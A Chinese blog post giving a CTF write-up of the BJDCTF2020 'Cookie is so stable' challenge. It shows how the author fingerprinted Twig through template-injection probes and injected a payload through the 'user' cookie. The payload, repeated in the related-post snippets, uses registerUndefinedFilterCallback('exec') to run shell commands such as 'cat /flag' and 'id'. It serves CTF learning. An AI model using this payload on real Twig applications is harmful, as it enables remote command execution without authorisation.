[BJDCTF2020]Cookie is so stable

最新推荐文章于 2023-04-03 20:01:35 发布
最新推荐文章于 2023-04-03 20:01:35 发布
阅读量281 收藏
点赞数
分类专栏: buu
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/missht0/article/details/113266550
版权

[BJDCTF2020]Cookie is so stable

在这里插入图片描述
像这种输什么回显什么的可以猜测是ssti注入
注入模板
在这里插入图片描述
在区分Jinja2和Twig那里是这样的:

Twig 
{{7*'7'}}  #输出49
Jinja
{{7*'7'}}  #输出7777777

开始判断:

{7*7}

在这里插入图片描述

{{7*'7'}}

在这里插入图片描述
所以注入模板是twig
hint里面有提示在这里插入图片描述
抓包,user是注入点
(抓包经过非常坎坷,开始是在输入页面抓包,抓出来的包没有回显,后来是在回显的页面抓到的包测试才有正常的回显)

在这里插入图片描述
直接用网上搜到的twig注入模板

{{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("cat /flag")}}

在这里插入图片描述

切谁怕谁
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
亚信java笔试题-BJDCTF2020_March:本届BJDCTF由江苏科技大学、北京工业大学、西南民族大学、杭州师范大学、江苏大学、湖南
06-03
BJDCTF2020_March 本届BJDCTF由江苏科技大学、北京工业大学、西南民族大学、杭州师范大学、 江苏大学、湖南工业大学(排名不分先后)联合举办 Notes:web题目easyaspnet需要在windows server 2016 docker native ...
获取cookie非常好用的google插件
06-10
可以安装到google浏览器,方便快速导出cookie数据
[BJDCTF2020]Cookie is so stable(PHP|Twig|SSTI)
记录学习,一起进步
04-03 682
[BJDCTF2020]Cookie is so stable(PHP|Twig|SSTI)
[BJDCTF2020]Cookie is so stable 1
weixin_44477223的博客
04-13 1192
运用的知识点 SSTI注入 题目 解题 一开始看到题目提示cookie 先抓一个包试试 没发现什么问题,点开另一个网页 感觉是注入的题目,但是sql注入没啥反应。但是你输入什么他就会回显什么 联想到SSTI注入,构造PL进行尝试: 发现确实能够利用SSTI 判断是twig,构造PL:{{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("id")}} 发现不是在这里绕过,我们抓取一个登录的包
IIS实现反向代理时Cookie域的设置方法
01-03
反向代理 神马是反向代理?指以代理服务器来接受Internet上的连接请求,然后将请求转发给内部网络上的服务器,并将从服务器上得到的结果返回给Internet上请求连接的客户端,此时代理...但是在多站点共享cookie时会存在
详解jQuery的Cookie插件
11-26
火狐浏览器提示:$.cookie is not a function;调试了半天,终于找到原因,如果同一个页面两次或者多次引入jQuery插件就会报此错误。  使用方法:  1、引入jQuery与jQuery.Cookie.js插件。 [removed][removed] &...
VUE前端cookie简单操作
12-28
如下是简单cookie操作,当前仅限前端实例,具体内容如下 要注意的有两点: 1、cookie内容存贮的名称 2、删除cookie是通过设置过期为过去时间实现的 <body> <button @click=clearCookie()> 清除...
SVM支持向量机分类鸢尾花数据集iris及代码
09-30
SVM支持向量机分类鸢尾花数据集iris及代码,数据集有Excel、data、txt文件格式,代码有data、txt格式演示
第四十七题——[BJDCTF2020]Cookie is so stable
分享简单的安全技术
04-27 184
题目地址:https://buuoj.cn/challenges 解题思路 第一步:进入题目,在导航条看到flag链接,点击后要求提交用户名 第二步:查找漏洞点 输入admin没有反应 输入{{7*'7'}}后出现49,而不是7777777,说明是使用Twig模板而不是Jinja2 第三步:了解Twig漏洞后获取flag Twing漏洞 输入123使用burpsuite抓包,结合题目提示cookie,确定user有问题 修改user值为:{{_self.env.register
【BUUCTF】[BJDCTF2020]Cookie is so stable
aoao331198的博客
04-30 218
flag页面比较容易看出来存在SSTI 看见有wp说是Twig模板注入,copy一下判断方法 尝试{{7*7}}, 返回49 尝试{{7*‘7’}},返回49,说明是Twig模板,但是如果返回7777777,则说明是Jinia2模板 不同的模板的攻击方式不同,贴一个好文章 一篇文章带你理解漏洞之 SSTI 漏洞 用PL {{_self.env.registerUndefinedFilterCallback("exec")}} {{_self.env.getFilter("id")}} 但是在输入框.
2020/7/19 - [BJDCTF2020]Cookie is so stable - twg服务器端模板注入
抒情诗
07-20 370
这是道服务器端模板注入,过段时间总结一下各种payload到一篇文章里。 测试ssti漏洞的payload为 {{7*'7'}} 如果返回的是49就是twg注入,7777777是jinja2(这个我还没实验,摘自他人文章) 返回的是49,说明是twg模板,下面是固定的测试twg注入的payload, 一篇文章带你理解漏洞之 SSTI 漏洞 {{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("id")}}
Uncaught ReferenceError: cookie is not defined
最新发布
01-25
Uncaught ReferenceError: cookie is not defined错误通常是因为在代码中使用了未定义的cookie变量。这可能是由于以下几个原因导致的: 1. 拼写错误:请确保你在代码中正确地拼写了cookie变量。检查是否有任何拼写...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值